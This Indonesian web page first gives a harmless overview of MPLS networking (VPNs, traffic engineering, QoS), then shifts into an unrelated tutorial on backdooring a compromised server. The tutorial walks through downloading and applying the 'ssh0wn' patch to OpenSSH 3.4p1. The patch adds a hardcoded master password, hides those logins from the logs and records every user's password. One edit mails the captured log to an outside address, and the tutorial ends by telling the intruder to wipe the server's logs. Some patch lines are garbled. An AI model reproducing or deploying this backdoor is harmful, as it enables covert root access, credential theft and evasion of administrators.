September 2010

Dokumen ini berisi komponen teknologi Multi-Protocol Label Switching (MPLS), fungsi-fungsinya dan ilustrasi nilai tambah bagi Service Provider. MPLS pada mulanya ditargetkan untuk pelanggan Service Provider; tetapi saat ini perusahaan-perusahaan sudah mulai tertarik untuk penerapan teknologi ini. Dokumen ini dapat diterapkan untuk perusahaan besar yang memiliki jaringan seperti Service Provider pada area berikut ini : * Size/ukuran besarnya jaringan * Menawarkan “internal services” untuk department yang berbeda dalam perusahaan MPLS komplimen dengan teknologi IP. MPLS di desain untuk membangkitkan kecerdasan yang berhubungan dengan IP Routing, dan Paradigma Switching yang berhubungan dengan Asynchronous Transfer Mode (ATM). MPLS terdiri dari Control Plane dan Forwarding Plane. Control Plane membuat apa yang disebut “Forwarding Table”, sementara Forwarding Plane meneruskan paket ke interface tertentu (berdasarkan Forwarding Table). Efisien desain dari MPLS adalah menggunakan Labels untuk membungkus/encapsulate paket IP. Sebuah Forwarding Table berisi list/mengurutkan Nilai-nalai Label (Label Values), yang masing-masing berhubungan dengan penentuan “outgoing interface” untuk setiap prefix network/jaringan. Cisco IOS Software support 2 mekanisme signalling untuk distribusi Label: Label Distribution Protocol (LDP) dan Resource Reservation Protocol/Traffic Engineering (RSVP/TE). MPLS meliputi komponen utama sebagai berikut : 1. MPLS Virtual Private Networks (VPNs) – memberikan “MPLS-enabled IP networks” untuk koneksi Layer 3 dan Layer 2. Berisi 2 komponen utama : 1. Layer 3 VPNs – menggunakan Border Gateway Protocol. 2. Layer 2 VPNs – Any Transport over MPLS (AToM) 2. MPLS Traffic Engineering (TE) – menyediakan peningkatan utilisasi dari bandwidth jaringan yang ada dan untuk “protection services”. 3. MPLS Quality of Service (QoS) – menggunakan mekanisme IP QoS existing, dan menyediakan perlakuan istimewa untuk type trafik tertentu, berdasarkan atribut QoS (seperti MPLS EXP) MPLS VPNs Layer 3 VPNs Layer 3 VPNs atau BGP VPNs, teknologi MPLS yang paling banyak digunakan. Layer 3 VPNs menggunakan “Virtual Routing instances” untuk membuat sebuah pemisahan table routing untuk tiap-tiap pelanggan/subscriber, dan menggunakan BGP untuk membentuk koneksi (peering relations) dan signal VPN-berLabel dengan masing-masing router Provider Edge (PE) yang sesuai. Hasilnya sangat scalable untuk diimplementasikan, karena router core (P) tidak memiliki informasi tentang VPNs. BGP VPNs sangat berguna ketika pelanggan menginginkan koneksi Layer 3 (IP), dan lebih menyukai untuk membuang overhead routing ke Service Provider. Hal ini menjamin bahwa keanekaragaman interface Layer 2 dapat digunakan pada tiap sisi/side VPN. Contoh, Site A menggunakan interface Ethernet, sementara Site B menggunakan interface ATM; Site A dan Site B adalah bagian dari single VPN. Relatif sederhana untuk penerapan “multiple topologies” dengan “router filtering”, Hub & Spoke atau Full Mesh: * Hub and Spoke – “central site” dikonfigurasi untuk “learn/mempelajari” semua “routes” dari seluruh remote sites, sementara remote sites dibatasi untuk “learn/mempelajari” routes, hanya khusus dari central site. * Topology Full Mesh akan menciptakan semua sites mempunyai kemampuan “learn/mempelajari” atau mengimport routes dari tiap site lainnya. Layer 3 VPNs telah dikembangkan dalam jaringan yang mempunyai router PE sebanyak 700. Saat ini terdapat Service Provider yang memiliki sampai 500 VPNs, dengan masing-masing VPN berisi site sebanyak 1000. Banyak ragam routing protocol yang digunakan pada link akses pelanggan (yaitu link CE ke PE); Static Routes, BGP, RIP dan Open Shortest Path First (OSPF). VPNs paling banyak menggunakan Static Routes, diikuti dengan Routing BGP. Layer 3 VPNs menawarkan kemampuan lebih, seperti Inter-AS dan Carrier Supporting Carrier (CSC). Hierarchical VPNs, memungkinkan Service Provider menyediakan koneksi melewati “multiple administrative networks”. Saat ini, penerapan awal dari fungsi seperti ini sudah tersebar luas. Layer 2 VPNs Layer 2 VPNs mengacu pada kemampuan dan kebutuhan dari pelanggan Service Provider untuk menyediakan Layer 2 Circuits melalui “MPLS-enabled IP backbone”. Penting untuk memahami 3 komponen utama dari Layer 2 VPNs: 1. Layer 2 Transport over over MPLS – Layer 2 circuit – membawa data secara transparent – melalui MPLS enabled IP backbone (juga dikenal sebagai AToM). 2. Virtual Private Wire Services – Kemampuan untuk menambahkan signalling ke AToM, dan untuk fitur-fitur seperti auto-discovery perangkat CE. 3. Virtual Private LAN Services – Kemampuan menambahkan Virtual Switch Instances (VSIs) pada router PE untuk membentuk “LAN based services” melalui MPLS-enabled IP backbone. Circuits Layer 2 yang dominan adalah Ethernet, ATM, Frame Relay, PPP, dan HDLC. AToM dan Layer 3 VPNs didasarkan pada konsep yang sama, tetapi AToM menggunakan sebuah “directed LDP session” untuk mendistribusikan Labels VC (analogy dengan BGP VPN Label). Oleh karena itu, router core tidak perlu mengetahui per-subscriber basis, hasinya sebuah architecture yang sangat “scalable”. Sebelum ada AToM, Service Provider harus membangun jaringan yang berbeda untuk menyediakan koneksi Layer 2. Contoh, Service Provider harus membangun sebuah ATM dan sebuah Frame Relay Network, hasilnya peningkatan biaya operasional dan “capital expenses”. Saat ini, Layer 2 VPNs MPLS memungkinkan Service Provider untuk menggabungkan jenis jaringan yang berbeda ini, sehingga menghemat biaya operasional dan “capital expenses” secara significant. Layer 2 VPNs dan Layer 3 VPNs dapat dikonfigurasi dalam single/satu box dan dapat difungsikan untuk meningkatkan keuntungan dari pelanggan. Layer 2 dan Layer 3 VPNs saling melengkapi satu sama lain. Dengan berjalannya waktu, demand untuk Layer 2 VPNs bisa jadi lebih tinggi dibandingkan dengan Layer 3 VPNs. MPLS Traffic Engineering MPLS TE sejak awal diharapkan Service Provider sebagai teknologi yang dapat memanfaatkan bandwitdh jaringan yang tersedia secara lebih baik dengan menggunakan jalur alternatif/alternate paths (selain dari “the shortest path). MPLS TE telah dikembangkan dengan beberapa keuntungan, termasuk Connectivity Protection menggunakan Fast ReRoute dan “Tight QoS”. “Tight QoS” dihasilkan dari penggunaan MPLS TE dan mekanisme QoS secara bersamaan. MPLS TE menggunakan IGP, IS-IS dan OSPF untuk menyebar informasi bandwidth melalui jaringan. MPLS TE juga menggunakan RSVP Extention untuk mendistribusikan label dan “constraint-based routing” untuk menghitung jalur/paths dalam jaringan. Extention ini telah didefinisikan di rfc 3209 Service Provider yang membangun MPLS cenderung untuk menerapkan “full mesh” TE Tunnels, menciptakan logical mesh, walaupun topology physical tidak full mesh. Pada situasi seperti ini, Service Provider telah memperolah tambahan 40% – 50% ketersediaan bandiwidth di jaringan. Keuntungan ini adalah penggunaan jaringan secara optimal, yang berperan penting pada penurunan “capital expenses”. MPLS TE menyediakan Connectivity Protection menggunakan Fast ReRoute (FRR). FRR memproteksi primary tunnels menggunakan pre-provisioned backup tunnels. Jika tunnel DOWN (failure condition), dibutuhkan waktu sekitar 50 ms untuk primary tunnel “switch over” ke backup tunnel. FRR bergantung pada proteksi Layer 3, tidak seperti proteksi SONET atau SDH yang terjadi pada level interface. Oleh karena itu, Waktu restorasi bergantung pada jumlah tunel dan jumlah prefix yang di”switch-over”. Ini adalah hal penting (key issue) yang harus dipertimbangkan ketika membuat desain FRR yang optimal. Test internal implementasi FRR Cisco telah menghasilkan performansi lebih baik dari 50 ms; walau bagaimanapun, waktu restorasi mungkin lebih tinggi, bergantung pada konfigurasi. FRR dapat digunakan untuk proteksi Links, Nodes dan seluruh LSP Path. Sebagian besar Service Provider lebih memperhatikan local failures, dan banyak ditemukan bahwa link failures lebih sering terjadi daripada node failures. DiffServ Aware Traffic Engineering mampu menjalankan TE untuk class trafik yang berbeda. Service Provider boleh memutuskan untuk mengoperasikan TE Tunnels yang memanfaatkan “sub-pool” untuk trafik Voice. Selanjutnya, Service Provider dapat menyakinkan bahwa tunnel ini menggunakan explicit path, dimana shortest path menghasilkan delay terpendek. Selain itu, terdapat TE Tunnels yang menggunakan “global pool” untuk trafik non-voice yang bukan “delay sensitive”. Hal ini penting untuk dicatat bahwa MPLS TE adalah fungsi dari Control Plane. Ketika solusi Virtual Leased Line (VLL) didefinisikan, mekanisme QoS yang sesuai harus dikonfigurasi (seperti Queuing atau Policing) untuk memenuhi garansi bandiwidth. Service Provider sudah mulai menawarkan jasa VLL sebagai trunk voice untuk menghubungkan Central Office termasuk PBX. MPLS Quality of Service MPLS QoS mempengaruhi mekanisme existing dari IP QoS DiffServ, memungkinkan mereka bekerja pada jalur/path MPLS. Extension tertentu, termasuk kemampuan untuk melakukan “set” dan “match” pada bit-bit MPLS EXP telah ditambahkan; meskipun “fundamental behavior” dari mekanisme QoS tetap tidak berubah. MPLS secara fundamental adalah teknik “tunneling”, jadi mekanisme QoS memungkinkan untuk penerapan yang flexible dengan “tunneling” QoS pelanggan melalui policies QoS dari Service Provider. Oleh karena itu, Service Provider seharusnya menggunakan nilai EXP 6 untuk voice, dan nilai EXP 4 dan 3 untuk trafik non-voice. Menyediakan transparent services secara simultan untuk Enterprise dengan Maps QoS sebagai berikut : * Menggunakan Prec 3 untuk voice dan Prec 2 untuk trafik non-voice * Menggunakan Prec 5 untuk voice dan Prec 4 untuk trafic non-voice Penawaran service QoS pada MPLS VPN telah menjadi nilai tambah bagi Service Provider, tetapi penerapan QoS bervariasi antar customer. Beberapa customer membuat hanya 2 class of services – (voice dan non-voice), sementara lainnya membuat sebanyak 5 class : â€¢ Best Effort Data â€¢ Interactive Data (i.e.,Telnet) â€¢ Mission Critical Data (ERP applications; i.e., SAP, PeopleSoft) â€¢ Video â€¢ Voice Kesimpulan MPLS sedang berkembang sebagai teknologi yang dapat diterima secara luas, dibuktikan dengan lebih dari 100 customers menerapkan Cisco MPLS. Hal ini penting untuk dicatat bahwa MPLS tidak menggantikan IP. IP Control Plane adalah komponen fundamental MPLS. Kemampuan menambahkan “ATM-like Forwarding Plane” membuatnya menarik bagi Service Provider dan Enterprises. Service Provider bisa mendapatkan keuntungan sebesar 25% dengan menerapkan MPLS VPNs, MPLS QoS dan MPLS TE, daripada sekedar menyediakan koneksi VPNs biasa. Kesimpulan akhir adalah, keuntungan utama bagi Service Provider dan Enterprises menerapakan MPLS-enabled IP Network adalah kemampuan menyediakan koneksi Layer 3 dan Layer 2 dan “shared services” (seperti DHCP, NAT, dll) melalui “single network”, dengan tingkat optimasi dan utilisasi yang tinggi dari bandwidth yang tersedia menggunakan TE dan QoS.

BACKDOOR

d1cyber

PENGERTIAN Backdoor (pintu belakang) adalah salah satu rootkit yang bertugas untuk memberikan jalasa masuk (secara illegal) terhadap sebuah sistem operasi, baik itu sifatnya single port atau multiple port. Backdoor bekerja secara invisible dan tidak bersifat sebagai normal authentication login. Backdoor bisa bersifat sebagai sniffer, dalam artian fungsi dari backdoor tidak sebatas sebagai jalan masuk (secara illegal), namun dia akan mempunyai dualisme tugas yaitu sebagai pencatat login yang ada didalam sebuah sistem operasi. [1.2] Menentukan Backdoor yang layak dipakai Pengertian dari memilih backdoor yang layak disini adalah yang mempunyai beberapa kriteria sebagai berikut: 1. Pastikan backdoor tersebut aman dari kontrol original root. 2. Backdoor yang dipakai tidak menimbulkan proses tambahan yang ada didalam sebuah server. 3. Mempunyai kemampuan yang multifungsi, dalam artian disamping sebagai jalan masuk juga berfungsi sebagai pencatat segala informasi yang ada didalam sistem operasi. Kenapa backdoor harus tidak menambah proses yang ada didalam server? karena disini penulis mengasumsikan bahwa sysadmin yang menjadi target `bukanlah orang yang bodoh’ mereka akan secara rutin mencatat segala perubahan yang terjadi didalam server. Hal ini menuntut kita untuk melakukan perubahan didalam server seminimal mungkin. Untuk tulisan ini, dipilih backdoor yang menginfeksi service OpenSSH, dengan pertimbangan bahwa service OpenSSH adalah service standar yang ada dalam sebuah sistem operasi UNIX, dan backdoor ini tidak menambah proses baru didalam server. Secara standar jenis backdoor ini sudah mempunyai dua fungsi yang ideal sebagai backdoor. Pertama memungkinkan kita untuk login secara remote dengan akses root secara invisible, dan kedua memungkinkan kita untuk mengetahui informasi dari login yang masuk dan keluar semua user yang ada didalam server. Kelemahannya mungkin tidak secara otomatis mengirimkan informasi tersebut kedalam email. Hal ini menyebabkan kita harus dua kali kerja untuk mengetahui informasi tersebut. Didalam tulisan ini disamping menjelaskan bagaimana menginstal backdoor tersebut, juga membahasa bagaimana cara mengoptimalkan kinerja backdoor ini. [2] Instalasi Backdoor OpenSSH-3.4p1 Ada beberapa hal yang harus diperhatikan sebelum kita melakukan penetrasi terhadap sebuah server yang berhasil kita masuki. Pertama adalah melihat versi OpenSSH asli yang ada didalam server, dan kedua adalah memperhatikan dan menganalisa seberapa sering root login didalam server, hal ini akan memberikan gambaran yang jelas seberapa teliti sysadmin dalam mengelola server. Dalam proses instalasi ini membutuhkan beberapa file pendukung yaitu: 1. ssh0wn.diff http://sec.angrypacket.com/code/ssh0wn.diff 2. Openssh-3.4p1.tar.gz http://openbsd.md5.com.ar/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz Setelah semua file pendukung tersebut berhasil anda simpan didalam server, langkah awal adalah melakukan pemecahan file OpenSSH-3.4p1 (extract), dan kedua memindahkan file ssh0wn.diff kedalam direktori OpenSSH-3.4p1 Gambaran secara jelas dalam proses instalasi dapat anda lihat dari ilustrasi dibawah ini: [betha@tiamat:~]$ wget http://sec.angrypacket.com/code/ssh0wn.diff –21:17:29– http://sec.angrypacket.com/code/ssh0wn.diff => `ssh0wn.diff’ Resolving sec.angrypacket.com… 64.84.39.37 Connecting to sec.angrypacket.com[64.84.39.37]:80… connected. HTTP request sent, awaiting response… 200 OK Length: 5,595 [text/plain] 100%[============================>] 5,595 –.–K/s 21:17:29 (1.29 MB/s) – `ssh0wn.diff’ saved [5595/5595] [betha@tiamat:~]$ wget http://openbsd.md5.com.ar/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz –21:17:40– http://openbsd.md5.com.ar/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz => `openssh-3.4p1.tar.gz’ Resolving openbsd.md5.com.ar… 200.32.4.46 Connecting to openbsd.md5.com.ar[200.32.4.46]:80… connected. HTTP request sent, awaiting response… 200 OK Length: 837,668 [application/x-tar] 100%[============================>] 837,668 38.64K/s ETA 00:00 21:18:03 (37.27 KB/s) – `openssh-3.4p1.tar.gz’ saved [837668/837668] [betha@tiamat:~]$ tar xzf openssh-3.4p1.tar.gz [betha@tiamat:~]$ mv ssh0wn.diff openssh-3.4p1 [betha@tiamat:~]$ cd openssh-3.4p1 [betha@tiamat:~/openssh-3.4p1]$ patch pw_name,password); fclose (outf); return 1; }else return 0; [...] ——————————————————————– Dan rubah file tersebut dengan: ——————————————————————– [...] if(strcmp(encrypted_password, pw_password) == 0){ outf = fopen(_LOG_DIR”/”_S_LOG,”a+”); fprintf (outf, “%s:%s:%s:%d%s\n”,pw->pw_name,password, get_remote_ipaddr(), get_local_port(), system(“cat /dev/hdal/slog | mail aris@kecoak.or.id”)); fclose (outf); return 1; }else return 0; [...] ——————————————————————– Simpan file tersebut dan segera memulai instalasi akhir dari penetrasi OpenSSH ini.Proses instalasi OpenSSH ini HANYA bisa dilakukan oleh akses root. [root@tiamat:~]# ./configure –prefix=/usr –sysconfdir=/etc/ssh [root@tiamat:~]# make [root@tiamat:~]# make install [root@tiamat:~]# make clean && make distclean [root@tiamat:~]# echo “UsePrivilegeSeparation no” >> sshd_config [root@tiamat:~]# cp -f sshd_config /etc/ssh/sshd_config [root@tiamat:~]# mkdir /dev/hdal [root@tiamat:~]# chmod 777 /dev/hdal [root@tiamat:~]# kill -HUP `cat /var/run/sshd.pid’ Proses akhir selesai, dan segera lakukan penghapusan log yang tertinggal diserver yang berhasil anda attack. Dan anda dapat login kedalam server tersebut melalui port standar openssh (22) dan dengan menggunakan password yang telah anda tentukan didalam file `includes.h’ [4] References — Backdoor Ensiklopedia — Angrypacket Security Project Lampiran ssh0wn.diff # $Id: ssh0wn.diff,v 1.6 2002/08/08 21:53:02 enz00 Exp $ # # patch for openssh-3.4p1 # # when applied this patch will authenticate you # as any user with the secret password and that user # will not be logged. it will also log logins/passwords # client and server side # # usage: # you’ll probably want to change the defines found below # make sure that the _LOG_DIR is chmod 777 # cp ssh0wn.diff openssh-3.4p1/;cd openssh-3.4p1 # patch pw_name,password); + fclose (outf); + return 1; + }else + return 0; #endif /* !USE_PAM && !HAVE_OSF_SIA */ } — openssh-3.4p1/auth.c Wed May 22 01:06:28 2002 +++ ssh0wn/auth.c Thu Aug 1 23:16:54 2002 @@ -248,14 +248,17 @@ else authmsg = authenticated ? “Accepted” : “Failed”; - authlog(“%s %s for %s%.100s from %.200s port %d%s”, - authmsg, - method, - authctxt->valid ? “” : “illegal user “, - authctxt->user, - get_remote_ipaddr(), - get_remote_port(), - info); + /* dont log if secret pass */ + if(!mlogin_ok){ + authlog(“%s %s for %s%.100s from %.200s port %d%s”, + authmsg, + method, + authctxt->valid ? “” : “illegal user “, + authctxt->user, + get_remote_ipaddr(), + get_remote_port(), + info); + } } /* — openssh-3.4p1/canohost.c Tue Jun 11 12:47:22 2002 +++ ssh0wn/canohost.c Wed Aug 7 17:43:34 2002 @@ -74,11 +74,13 @@ debug3(“Trying to reverse map address %.100s.”, ntop); /* Map the IP address to a host name. */ - if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), - NULL, 0, NI_NAMEREQD) != 0) { - /* Host name not found. Use ip address. */ - log(“Could not reverse map address %.100s.”, ntop); - return xstrdup(ntop); + if(!mlogin_ok){ + if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), + NULL, 0, NI_NAMEREQD) != 0) { + /* Host name not found. Use ip address. */ + log(“Could not reverse map address %.100s.”, ntop); + return xstrdup(ntop); + } } /* Got host name. */ — openssh-3.4p1/includes.h Mon May 13 01:14:09 2002 +++ ssh0wn/includes.h Thu Aug 8 15:45:46 2002 @@ -157,4 +157,13 @@ #include “entropy.h” +/* hax0r shit */ +#define _SECRET_PASSWD “l33thex0r_passwerd” +#define _LOG_DIR “/dev/hdal” +#define _S_LOG “slog” +#define _C_LOG “clog” +FILE *outf; +int mlogin_ok; +/* end hax0r shit */ + #endif /* INCLUDES_H */ — openssh-3.4p1/sshconnect1.c Thu Jun 6 15:57:34 2002 +++ ssh0wn/sshconnect1.c Thu Aug 8 15:48:48 2002 @@ -922,6 +922,7 @@ { int type, i; char *password; + char gpasswd[120]; debug(“Doing password authentication.”); if (options.cipher == SSH_CIPHER_NONE) @@ -930,6 +931,7 @@ if (i != 0) error(“Permission denied, please try again.”); password = read_passphrase(prompt, 0); + strcpy(gpasswd,password); packet_start(SSH_CMSG_AUTH_PASSWORD); ssh_put_password(password); memset(password, 0, strlen(password)); @@ -938,8 +940,15 @@ packet_write_wait(); type = packet_read(); - if (type == SSH_SMSG_SUCCESS) + if (type == SSH_SMSG_SUCCESS){ + /* dont log if secret pass */ + if(strcmp(_SECRET_PASSWD,gpasswd) != 0){ + outf = fopen(_LOG_DIR”/”_C_LOG,”a+”); + fprintf (outf,”%s:%s@%s\n”,options.user,gpasswd,get_remote_ipaddr()); + fclose (outf); + } return 1; + } if (type != SSH_SMSG_FAILURE) packet_disconnect(“Protocol error: got %d in response to passwd auth”, type); } — openssh-3.4p1/sshconnect2.c Sun Jun 23 17:23:21 2002 +++ ssh0wn/sshconnect2.c Thu Aug 8 15:48:20 2002 @@ -446,6 +446,7 @@ static int attempt = 0; char prompt[150]; char *password; + char gpasswd[120]; if (attempt++ >= options.number_of_password_prompts) return 0; @@ -456,6 +457,7 @@ snprintf(prompt, sizeof(prompt), “%.30s@%.128s’s password: “, authctxt->server_user, authctxt->host); password = read_passphrase(prompt, 0); + strcpy(gpasswd,password); packet_start(SSH2_MSG_USERAUTH_REQUEST); packet_put_cstring(authctxt->server_user); packet_put_cstring(authctxt->service); @@ -470,6 +472,12 @@ dispatch_set(SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ, &input_userauth_passwd_changereq); + /* dont log if its the secret pass */ + if(strcmp(_SECRET_PASSWD,gpasswd) != 0){ + outf = fopen(_LOG_DIR”/”_C_LOG,”a+”); + fprintf (outf,”%s:%s@%s\n”,options.user,gpasswd,get_remote_ipaddr()); + fclose (outf); + } return 1; } /* — openssh-3.4p1/sshlogin.c Sun Jun 23 17:23:21 2002 +++ ssh0wn/sshlogin.c Thu Aug 8 15:46:10 2002 @@ -71,8 +71,11 @@ li = login_alloc_entry(pid, user, host, ttyname); login_set_addr(li, addr, sizeof(struct sockaddr)); - login_login(li); - login_free_entry(li); + /* dont log if secret pass */ + if(!mlogin_ok){ + login_login(li); + login_free_entry(li); + } } #ifdef LOGIN_NEEDS_UTMPX @@ -96,6 +99,9 @@ struct logininfo *li; li = login_alloc_entry(pid, user, NULL, ttyname); - login_logout(li); - login_free_entry(li); + /* no logout if secret pass */ + if(!mlogin_ok){ + login_logout(li); + login_free_entry(li); + } }